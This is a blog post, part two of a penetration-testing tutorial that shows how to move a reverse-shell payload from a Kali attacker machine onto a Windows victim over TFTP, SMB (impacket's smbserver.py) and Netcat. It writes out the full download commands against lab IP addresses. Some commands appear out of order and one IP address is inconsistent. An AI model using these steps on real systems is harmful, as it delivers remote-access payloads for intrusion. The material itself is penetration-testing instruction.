OCSP: FILE TRANSFER RECIPE FOR DELICIOUS POST EXPLOITATION

Wasim Shaikh
Jun 19 · 7 min read

PART 2:

If you did not read my previous write-up, please visit below link to read part 1,

Link: https://medium.com/@dr.spitfire/ocsp-file-transfer-recipe-for-delicious-post-exploitation-832331cffd9f?sk=bb840302e5dcbd7ded5892148bc4a78d

Please keep in mind the below preamble to understand this write-up better,

TFTP is also known as Trivial File Transfer Protocol which runs on port number 69. TFTP protocol does not need any authentication like we used in FTP (anonymous:any_password). TFTP does not perform error detection regarding file sharing. This is because TFTP works on UDP. Thus, TFTP is faster than FTP. TFTP often used for transferring files such as audios, videos and images.
Step A: Setting a Server on the Attacker’s Machine
TFTP comes by default in Kali Linux. The name of the package is “atftpd”. Let me explain where is the local directory for a TFTP Server in Kali Linux.

A.1: Finding Local Directory of Server. The default local directory for TFTP server is “/srv/tftp”. Thus, copy all the files you want to share by using TFTP protocol to the local directory of the server. Please see below screenshot, I have copied/kept reverse_shell.exe file at /srv/tftp directory.

root@kali:~# cd /srv/tftp

root@kali:/srv/tftp# dir

A.2: Starting/ Running a Server
There are two ways of setting a server in Kali Linux. One is using “atftpd” package that comes by default and second is using Metasploit’s TFTP module.
To start the TFTP server on Kali Linux, all you need is hit below command.

root@kali:~# service atftpd start Please see below screenshot. I have started tftp server on Attacker’s machine and IP address of the attacker’s machine is shown in below screenshot,

Next method is using Metasploit. Starting and running a server using Metasploit’s TFTP module is also very simple. Follow below command,
root@kali:/# msfconsole

msf > use auxiliary/server/tftp

msf auxiliary(server/ftp) > run

Step B: Downloading Files on Victim’s Machine
Next step here is to download the files from TFTP server on the victim’s machine. But, before going ahead, we need to find if we have TFTP client on our victim’s machine or not.
In Windows XP, TFTP comes by default and enabled by default as well. However, this is not the case with a higher version of Windows. In Windows 7 and above, TFTP comes by default but you need to enable it manually.
For this write-up, I am using Windows 7. Thus, I will enable TFTP manually. To achieve that, hit below command,

Now, we have activated TFTP protocol on our victim machine. We are all set to download the file. C:\> pkgmgr /iu:”TFTP”
To download file on victim’s machine, please use below command in Windows terminal.

Please see below screenshot. I have downloaded file revserse_shell.exe from the attacker’s machine to the victim’s machine. C:\>tftp -i IP_Address GET reverse_shell.exe

C:\Users\SPITFIRE> tftp -i 192.168.1.14 reverse_shell.exe

One point to note here is, you will get files copied to the directory on victim’s machine from where you have initiated TFTP protocol. Just like when I hit command from “C-USERS-SPITFIRE”, I got file reverse_shell.exe at same directory. Similarly, when I used Metasploit’s TFTP Module to start the server, I used the same local directory on the attacker’s machine that is /srv/tftp. However, I changed my location at victim’s machine from where I had initiated the TFTP protocol.
C:\Users\SPITFIRE\Music>tftp -i 192.168.1.14 GET reverse_shell.exe

In the above screenshot, I have got the reverse_shell.exe file at C:\Users\SPITFIRE\Music>. 4. Using SMB Protocol The Server Message Block ( SMB ) Protocol is a network file sharing protocol , and as implemented in Microsoft Windows is known as Microsoft SMB Protocol . SMB Protocol runs on port 445 by default. SMB is built into Windows and doesn’t require any special commands as Windows understands UNC paths. You can simply use the standard copy and move commands and SMB handles the file transferring automatically for you. What’s even better is Windows will actually let you execute files via UNC paths, meaning you can download and execute a payload in one command! File transfer using the SMB protocol is very simple. Please follow below steps A and B. As I said earlier, Kali Linux is our attacker’s machine. Python comes with SMB server by default. Thus, we can use “smbserver.py” module of Python. In order to check whether you have “smbservr.py” module installed on your machine or not, use below command, Step A: Setting a Server on the Attacker’s Machine root@kali:~# locate smbserver.py

Once we are sure that smbserver.py module of Python is available on our machine, the next step is finding the local directory and keeping all the files that we need to send to the victim’s machine in that local directory.

As shown in above screenshot, /usr/share/doc/python-impacket/examples/ is the directory where smbserver.py is located. Thus, we will consider it as our local directory. However, remember we had set local directory explicitly using TFTPROOT command in Metasploit’s TFTP module? Exact same way, Python SMB server gives us an option to define local directory. We can use SPITFIRE (root folder) to set the local directory.

As mentioned above, we can set a local directory using SPITFIRE root folder at the same time we can start an SMB server of Python. To start the Python’s SMB server, go to the directory where the smbserver.py file is placed and hit “smbserver.py” command to start it. You can follow below commands, root@kali:~# cd /usr/share/doc/python-impacket/examples

root@kali:/usr/share/doc/python-impacket/examples#python smbserver.py SPITFIRE /usr/share/doc/python-impacket/examples

As shown below, I have copied files that I want to send to victim’s machine. reverse_shell.exe file is kept at /usr/share/doc/python-impacket/examples

We have started the SMB server on the attacker’s machine. The last step is to fetch them from the victim’s machine.

Step B: Downloading Files on Victim’s Machine

We have started SMB server on port 445 by default. Let’s confirm from our victim’s machine. Using net view command in windows, we can confirm the running SMB server on any IP_Address. To confirm,

C:\Users\SPITFIRE>net view \\192.168.1.14

Also, we can check what are the directories and folder are there on respective SMB server.

C:\Users\SPITFIRE>dir \\192.168.1.186\SPITFIRE

And now, the final step is getting reverse_shell.exe file from the attacker’s machine to the victim’s machine.

C:\Users\SPITFIRE>copy \\192.168.1.14\SPITFIRE\reverse_shell.exe

As shown in the above screenshot, reverse_shell.exe file will be downloaded from attacker’s machine into the victim machine at location/directory from where we hit copy command. Just like in the above case, reverse_shell.exe file is copied at C->Users->SPITFIRE.

The last method that I am going to explain here is the use of Netcat for file transfer. This is the most simple way to share the files between the attacker’s machine and the victim’s machine. Here I am going to change my way of explanation as it is just a two-step process. In this step, you are supposed to configure the listener on the victim’s machine with port and name of the file you want on the victim’s machine. For that, all you need is Netcat set up on your victim’s machine. Windows machine does not come with netcat.exe by default. Download it from the internet. Keep that file nc.exe on Desktop. Go to Desktop by navigating directory and hit below command, Step1: Configure the listener on the Victim’s machine Above command will make victim’s machine to start listening on local port 1234. Now you can serve the reverse_shell.exe file from your Kali Machine on port 1234 of Victim’s machine with IP Address 192.168.1.8. Use below command to achieve that. C:\Users\SPITFIRE\Desktop> nc -nlvp 1234 >reverse_shell.exe root@kali:~# nc -nv 192.168.1.14 1234 var/www/html/reverse_shell.exe

As soon as you hit the above command in Kali Linux machine, you will find a listener that we configured on victim’s machine has got reverse_shell.exe. As we had started netcat from Desktop, we will get reverse_shell.exe file on Desktop of victim’s machine.

Please comment for any suggestions, bits of advice; always welcome! Stay in touch to read about more interesting information about bug bounty, penetration testing and Infosec.

You can follow me on Twitter to read my upcoming blogs: https://twitter.com/Wa_sim_sim

Wasim Shaikh

Written by

Security Consultant; Ethical Hacker; Penetration Tester; Bug Bounty Hunter; A son; A brother; A friend! Twitter: @Wa_sim_sim